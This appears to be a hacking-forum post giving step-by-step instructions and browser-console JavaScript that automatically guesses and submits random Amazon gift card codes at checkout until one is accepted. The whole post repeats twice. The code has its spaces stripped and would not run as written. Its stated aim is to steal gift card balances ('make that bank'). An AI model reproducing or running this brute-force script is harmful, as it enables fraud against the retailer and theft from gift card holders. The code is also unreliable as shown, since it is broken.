gns5713
Concurrency Connoisseur
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 2
800 XP
Online Amazon Gift Card Checker
This an updated method/code since the one that I saw didn't work on amazon.co.uk/.es/.de (non .com)
1. Create an Amazon account or Use your current one.
2. Add any item to your cart.
3. Checkout til the part you have to put your payment info in.
4. Click Enter a gift card or promotional code.
5. Right click anywhere and click Inspect.
6. Click on console and type this code in.
alert("Online Amazon Giftcard Checker");
alert("Hope This works!");
varspeed=prompt("Type 1,000 if your PC is fast, 500 for a slow pc")
functionmakeid() {
vartext= "";
varpossible= "6SJXEoQ0Htx4WhvKgu2b3fIrle8wBZs1MRpT9PGyDCLVUmYO5AdiankFc7qjzN"; //you can edit this to your own generation code
for (vari= 0;i< 14;i++)
text+=possible.charAt(Math.floor(Math.random() *possible.length));
returntext;
}
functionmain() {
document.getElementsByName("ppw-claimCode")[0].value=makeid();
document.getElementsByName("ppw-claimCodeApplyPressed")[0].click();
}
setInterval(function() {
main();
},speed);
7. After you pasted the code in press enter and keep clicking okay til you have to type something.
8. Type 1000 if your computer is fast or type 500 if your computer is slow. If you put nothing it will keep making codes but the only way to stop it is to kill the browser.
9. Wait til you get a valid code and boom make that bank.
This an updated method/code since the one that I saw didn't work on amazon.co.uk/.es/.de (non .com)
1. Create an Amazon account or Use your current one.
2. Add any item to your cart.
3. Checkout til the part you have to put your payment info in.
4. Click Enter a gift card or promotional code.
5. Right click anywhere and click Inspect.
6. Click on console and type this code in.
alert("Online Amazon Giftcard Checker");
alert("Hope This works!");
varspeed=prompt("Type 1,000 if your PC is fast, 500 for a slow pc")
functionmakeid() {
vartext= "";
varpossible= "6SJXEoQ0Htx4WhvKgu2b3fIrle8wBZs1MRpT9PGyDCLVUmYO5AdiankFc7qjzN"; //you can edit this to your own generation code
for (vari= 0;i< 14;i++)
text+=possible.charAt(Math.floor(Math.random() *possible.length));
returntext;
}
functionmain() {
document.getElementsByName("ppw-claimCode")[0].value=makeid();
document.getElementsByName("ppw-claimCodeApplyPressed")[0].click();
}
setInterval(function() {
main();
},speed);
7. After you pasted the code in press enter and keep clicking okay til you have to type something.
8. Type 1000 if your computer is fast or type 500 if your computer is slow. If you put nothing it will keep making codes but the only way to stop it is to kill the browser.
9. Wait til you get a valid code and boom make that bank.